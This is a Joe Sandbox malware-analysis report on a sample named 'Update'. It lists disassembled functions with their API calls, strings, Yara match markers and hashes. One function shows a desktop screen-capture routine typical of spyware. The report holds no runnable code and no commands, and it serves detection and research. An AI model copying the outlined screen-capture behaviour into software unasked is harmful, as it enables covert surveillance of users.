                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleEventsInputNumber$CloseCreateErrorFileHandleLast___initconin
                                                                                            • String ID:
                                                                                            • API String ID: 1600138625-0
                                                                                            • Opcode ID: df18817ed2d6a27d1b1349aae5b00a530f68bc2b87b35c7cfc7c52851554a46d
                                                                                            • Instruction ID: 81603e07bf2549b01ffc5fd9c9cd22693237d2cb569674f7dac8006a2857196c
                                                                                            • Opcode Fuzzy Hash: df18817ed2d6a27d1b1349aae5b00a530f68bc2b87b35c7cfc7c52851554a46d
                                                                                            • Instruction Fuzzy Hash: E9E0BF36600158BBCF222BE9D9099C93E79EB563A97050160F90AE7610DB22C861DFE5
                                                                                            Function 6C3A0B72 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleMode.KERNEL32(0000000C,?,?,6C3934A7,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0B81
                                                                                            • GetLastError.KERNEL32(?,6C3934A7,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0B8D
                                                                                              • Part of subcall function 6C3A0C1D: CloseHandle.KERNEL32(FFFFFFFF,6C3A0B05,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C2D
                                                                                            • ___initconin.LIBCMT ref: 6C3A0B9D
                                                                                              • Part of subcall function 6C3A0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6C3A0A79,6C3936CB,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C11
                                                                                            • GetConsoleMode.KERNEL32(0000000C,?,6C3934A7,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0BAB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
                                                                                            • String ID:
                                                                                            • API String ID: 3067319862-0
                                                                                            • Opcode ID: 5767fe8e66eaf1d4a9b08ec6d9ba7425798c54366aadb6b1d5ae10bbdf86ac47
                                                                                            • Instruction ID: f04fd6b98f117d5201d7bffddb71dac6845108cf07e73f0841331aa7add42037
                                                                                            • Opcode Fuzzy Hash: 5767fe8e66eaf1d4a9b08ec6d9ba7425798c54366aadb6b1d5ae10bbdf86ac47
                                                                                            • Instruction Fuzzy Hash: 18E04F366002697BCF212BDAD9089C93F79EB577A93050160F90AE3610CA22C861CFE5
                                                                                            Function 6C3A0BB8 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleMode.KERNEL32(0000000C,00000000,?,6C3934AF,00000000,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0BC7
                                                                                            • GetLastError.KERNEL32(?,6C3934AF,00000000,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0BD3
                                                                                              • Part of subcall function 6C3A0C1D: CloseHandle.KERNEL32(FFFFFFFF,6C3A0B05,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C2D
                                                                                            • ___initconin.LIBCMT ref: 6C3A0BE3
                                                                                              • Part of subcall function 6C3A0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6C3A0A79,6C3936CB,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C11
                                                                                            • SetConsoleMode.KERNEL32(0000000C,?,6C3934AF,00000000,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0BF1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
                                                                                            • String ID:
                                                                                            • API String ID: 3067319862-0
                                                                                            • Opcode ID: d5ebf62f180524b13fd9d9f5ada6e66f2350462f7a58271f74ad017209ad86cc
                                                                                            • Instruction ID: 8bc376526212c841d4bdaded6be3aaa429b3a3082e740e6bb414a8af7c9da736
                                                                                            • Opcode Fuzzy Hash: d5ebf62f180524b13fd9d9f5ada6e66f2350462f7a58271f74ad017209ad86cc
                                                                                            • Instruction Fuzzy Hash: E9E0BF366411546FCF212BD9DD089C93E79EB963B97050160F90AE7610DA22C8A19FE5
                                                                                            Function 0304980F Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 302COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 0304997F
                                                                                              • Part of subcall function 0304F032: __FF_MSGBANNER.LIBCMT ref: 0304F04B
                                                                                              • Part of subcall function 0304F032: __NMSG_WRITE.LIBCMT ref: 0304F052
                                                                                            • _memcpy_s.LIBCMT ref: 03049B42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _malloc_memcpy_s
                                                                                            • String ID: &
                                                                                            • API String ID: 3561290194-3042966939
                                                                                            • Opcode ID: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                            • Instruction ID: 466eb5a5026a7a65bcd3b1e9106ad81e8bb7650af24fe7e2871b13106da45636
                                                                                            • Opcode Fuzzy Hash: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                            • Instruction Fuzzy Hash: FFC141F1A012199BDB64DF55CCC0BAAB7F8EB88300F1485BDD609A7241D774AE85CF94
                                                                                            Function 6C38BCAF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldiv
                                                                                            • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                            • API String ID: 3732870572-1956417402
                                                                                            • Opcode ID: e0cb8158399e100eb13fa67edbd6ccb59492ee29cc2e6f1be0719e68c99e68e5
                                                                                            • Instruction ID: 41aa758a1bcb2f47f6d9036cf6acc78576af9974691ab2dd39d693d4cbde6bc2
                                                                                            • Opcode Fuzzy Hash: e0cb8158399e100eb13fa67edbd6ccb59492ee29cc2e6f1be0719e68c99e68e5
                                                                                            • Instruction Fuzzy Hash: 60611770E0624BAFDB118EA9CC807AEBBF9AF4630CF244099D4909FB50D73599498F61
                                                                                            Function 0304C2CF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset_wcsrchr
                                                                                            • String ID: D
                                                                                            • API String ID: 1675014779-2746444292
                                                                                            • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                            • Instruction ID: f3ad6dc004ea0431a3820f72c05700246d95b08a9744dafee62ae1e99187bfab
                                                                                            • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                            • Instruction Fuzzy Hash: 0231E9B69412187BE720E7A4AC89FFF776CEB84710F140125FB0A9A1C0DA719A46C6E5
                                                                                            Function 6C393691 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __alloca_probe_16__freea
                                                                                            • String ID: gfff
                                                                                            • API String ID: 1635606685-1553575800
                                                                                            • Opcode ID: 56cbbee33a8e33ec81e3e7348b444f51fbd23544890294a15346105f538ccdba
                                                                                            • Instruction ID: da3a4b77ff517397a62b562899e5e1770782366282d246b815629693c19c1fb9
                                                                                            • Opcode Fuzzy Hash: 56cbbee33a8e33ec81e3e7348b444f51fbd23544890294a15346105f538ccdba
                                                                                            • Instruction Fuzzy Hash: 0A3138F6A016119BDB509BA9C880A9FB7B8DF45B2CB210629C86CD7F40F732D9058F91
                                                                                            Function 6C39A0C7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,6C399FC8,?,?,00000000,00000000,00000000,?), ref: 6C39A0EC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: EncodePointer
                                                                                            • String ID: MOC$RCC
                                                                                            • API String ID: 2118026453-2084237596
                                                                                            • Opcode ID: 8e5eb93fb80531f1c4c46fb9c5622f9df424b84c5c68bbabcad7ad15a757a13a
                                                                                            • Instruction ID: b5573132e1f815564ed2933f8477c69a626a83aed14d2cdd0c64bbeb171e8199
                                                                                            • Opcode Fuzzy Hash: 8e5eb93fb80531f1c4c46fb9c5622f9df424b84c5c68bbabcad7ad15a757a13a
                                                                                            • Instruction Fuzzy Hash: BA417872E01209AFCF05CF94CC80AEEBBB5FF48308F148259E915A7611E736A950DF91
                                                                                            Function 6C3730B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C3730E6
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C373222
                                                                                              • Part of subcall function 6C38B0F3: _Yarn.LIBCPMT ref: 6C38B113
                                                                                              • Part of subcall function 6C38B0F3: _Yarn.LIBCPMT ref: 6C38B137
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                            • String ID: bad locale name
                                                                                            • API String ID: 2070049627-1405518554
                                                                                            • Opcode ID: 06b834f8c5c5cd12d8e8098583cee16e8dd84ce9304339251b8cbd6ce7064cc5
                                                                                            • Instruction ID: 8318f4003a9b3738431096e7c54f36ac3d9af544e8d3bde557f5978c146e7abd
                                                                                            • Opcode Fuzzy Hash: 06b834f8c5c5cd12d8e8098583cee16e8dd84ce9304339251b8cbd6ce7064cc5
                                                                                            • Instruction Fuzzy Hash: 22414DF1A017459BEB20DF69D814757BBE8BF04708F004528E4999BB80E77AE518CFE6
                                                                                            Function 6C399933 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C399BAA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___except_validate_context_record
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 3493665558-3733052814
                                                                                            • Opcode ID: b2fe6a01613e97c4ac754c421453100dbcd3a0a6c2c8cc90d6847e51bca67214
                                                                                            • Instruction ID: aeefb7d5ede59c06db5eb1e8e1f4669be6365b8ab777ce2c21359c83d1dd23e6
                                                                                            • Opcode Fuzzy Hash: b2fe6a01613e97c4ac754c421453100dbcd3a0a6c2c8cc90d6847e51bca67214
                                                                                            • Instruction Fuzzy Hash: 0031C472415318AFCF12AF55CC4099A3BAAFF09319B18425AFC5C49620E337C8A1DFD2
                                                                                            Function 6C3726D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: Y.7l$ios_base::badbit set
                                                                                            • API String ID: 4218353326-2685304014
                                                                                            • Opcode ID: 2ba67ad5ab615baa55b81c8a8bb1c39593a444877ceefda0ae20bb14b21125a6
                                                                                            • Instruction ID: 8bac72f75dae20e9779ed14a6c0d27db7de710056b327e895e335e040bb91418
                                                                                            • Opcode Fuzzy Hash: 2ba67ad5ab615baa55b81c8a8bb1c39593a444877ceefda0ae20bb14b21125a6
                                                                                            • Instruction Fuzzy Hash: 683181B2C00258DBDB10DFA4D944BDEBBB5EB48324F140229E844A7781E33A5A94CBB5
                                                                                            Function 034EB19D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 034EBC70: GetDesktopWindow.USER32 ref: 034EBC8F
                                                                                              • Part of subcall function 034EBC70: GetDC.USER32(00000000), ref: 034EBC9C
                                                                                              • Part of subcall function 034EBC70: CreateCompatibleDC.GDI32(00000000), ref: 034EBCA2
                                                                                              • Part of subcall function 034EBC70: GetDC.USER32(00000000), ref: 034EBCAD
                                                                                              • Part of subcall function 034EBC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 034EBCBA
                                                                                              • Part of subcall function 034EBC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 034EBCC2
                                                                                              • Part of subcall function 034EBC70: ReleaseDC.USER32(00000000,00000000), ref: 034EBCD3
                                                                                              • Part of subcall function 034EBC70: GetSystemMetrics.USER32(0000004C), ref: 034EBD78
                                                                                              • Part of subcall function 034EBC70: GetSystemMetrics.USER32(0000004D), ref: 034EBD8D
                                                                                              • Part of subcall function 034EBC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 034EBDA6
                                                                                              • Part of subcall function 034EBC70: SelectObject.GDI32(?,00000000), ref: 034EBDB4
                                                                                              • Part of subcall function 034EBC70: SetStretchBltMode.GDI32(?,00000003), ref: 034EBDC0
                                                                                              • Part of subcall function 034EBC70: GetSystemMetrics.USER32(0000004F), ref: 034EBDCD
                                                                                              • Part of subcall function 034EBC70: GetSystemMetrics.USER32(0000004E), ref: 034EBDE0
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                            • _memset.LIBCMT ref: 034EB1E1
                                                                                            • swprintf.LIBCMT ref: 034EB204
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                            • String ID: %s %s
                                                                                            • API String ID: 1028806752-581060391
                                                                                            • Opcode ID: e1fd35b98158eb5c773c24207cf71520b8eb345407160609fdcc546528d4adf0
                                                                                            • Instruction ID: 98f934b32774721bd4c1291741fef947d6cea4d84c657ef26eaa36bb8bfe8fd8
                                                                                            • Opcode Fuzzy Hash: e1fd35b98158eb5c773c24207cf71520b8eb345407160609fdcc546528d4adf0
                                                                                            • Instruction Fuzzy Hash: 5B21F6B6904340AFD210EB16EC84E5FB7E8EFD9711F08092FF8895E241E6719908C7A7
                                                                                            Function 034E9100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E9115
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF4E
                                                                                              • Part of subcall function 034EEF39: __CxxThrowException@8.LIBCMT ref: 034EEF63
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF74
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E9128
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                            • String ID: string too long
                                                                                            • API String ID: 963545896-2556327735
                                                                                            • Opcode ID: 0af2d7c67cded4a3c5b21a6acd28829c766af110b54555b96c3fd50b7dd3b08e
                                                                                            • Instruction ID: 2d1e89eefc07496a9feb6e0e63ba22a7faf475616d2b3f91f00eca0af384557a
                                                                                            • Opcode Fuzzy Hash: 0af2d7c67cded4a3c5b21a6acd28829c766af110b54555b96c3fd50b7dd3b08e
                                                                                            • Instruction Fuzzy Hash: 951190793043409BD321CA2DE804A1AF7E9ABA6662F140A6FE1918F7C1D776D805C7A9
                                                                                            Function 034E93F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __CxxThrowException@8.LIBCMT ref: 034E941D
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E944A
                                                                                            Strings
                                                                                            • invalid string position, xrefs: 034E9445
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                            • String ID: invalid string position
                                                                                            • API String ID: 3614006799-1799206989
                                                                                            • Opcode ID: 16765fd332f278d70ade1c68342eec362e40e823924a6e5ebe5ea7be2465d352
                                                                                            • Instruction ID: f7b9e342b875dee7f7fe2cedae5381c82af54a00b4d510be3b08bbda544d2bb7
                                                                                            • Opcode Fuzzy Hash: 16765fd332f278d70ade1c68342eec362e40e823924a6e5ebe5ea7be2465d352
                                                                                            • Instruction Fuzzy Hash: 110126336043006FC724EE68D88078AF399AF40622F150A2FE1629F6C0D7B5E984C7E9
                                                                                            Function 00916FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __output_l.LIBCMT ref: 00916FFC
                                                                                              • Part of subcall function 009170E4: __getptd_noexit.LIBCMT ref: 009170E4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit__output_l
                                                                                            • String ID: B
                                                                                            • API String ID: 2141734944-1255198513
                                                                                            • Opcode ID: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                            • Instruction ID: 555a97c323d97fa906f7fd1265ad58273d2d6992c7c2b48b8644be67c74e5df0
                                                                                            • Opcode Fuzzy Hash: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                            • Instruction Fuzzy Hash: E201AD72E0420E9BDF009FA4CC01BEEBBF9FB48364F000155F924A6281D7749541DBA1
                                                                                            Function 034EF7BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __output_l.LIBCMT ref: 034EF815
                                                                                              • Part of subcall function 034EF91B: __getptd_noexit.LIBCMT ref: 034EF91B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit__output_l
                                                                                            • String ID: B
                                                                                            • API String ID: 2141734944-1255198513
                                                                                            • Opcode ID: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
                                                                                            • Instruction ID: ebf5dfe5fffad52fbf457f0b6d27544afa233645952327de7d154a51ac9274bc
                                                                                            • Opcode Fuzzy Hash: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
                                                                                            • Instruction Fuzzy Hash: 12018075A002499FDF00DFA5DC01BFEBBB8FB04364F15411AE924AE280E7749505DBB9
                                                                                            Function 0304F179 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __output_l.LIBCMT ref: 0304F1D4
                                                                                              • Part of subcall function 0304F2DA: __getptd_noexit.LIBCMT ref: 0304F2DA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit__output_l
                                                                                            • String ID: B
                                                                                            • API String ID: 2141734944-1255198513
                                                                                            • Opcode ID: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                            • Instruction ID: 96b264fe1e82c0521e20e27ce6d70061610ae8f426dd5d375e262f67e4048854
                                                                                            • Opcode Fuzzy Hash: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                            • Instruction Fuzzy Hash: 700180B5E0120AABDF10DFA8CC01BEEBBF8FB44364F144125F824AA290D7749601CBB1
                                                                                            Function 034E9570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E957F
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEF9B
                                                                                              • Part of subcall function 034EEF86: __CxxThrowException@8.LIBCMT ref: 034EEFB0
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEFC1
                                                                                            • _memmove.LIBCMT ref: 034E95B5
                                                                                            Strings
                                                                                            • invalid string position, xrefs: 034E957A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                            • String ID: invalid string position
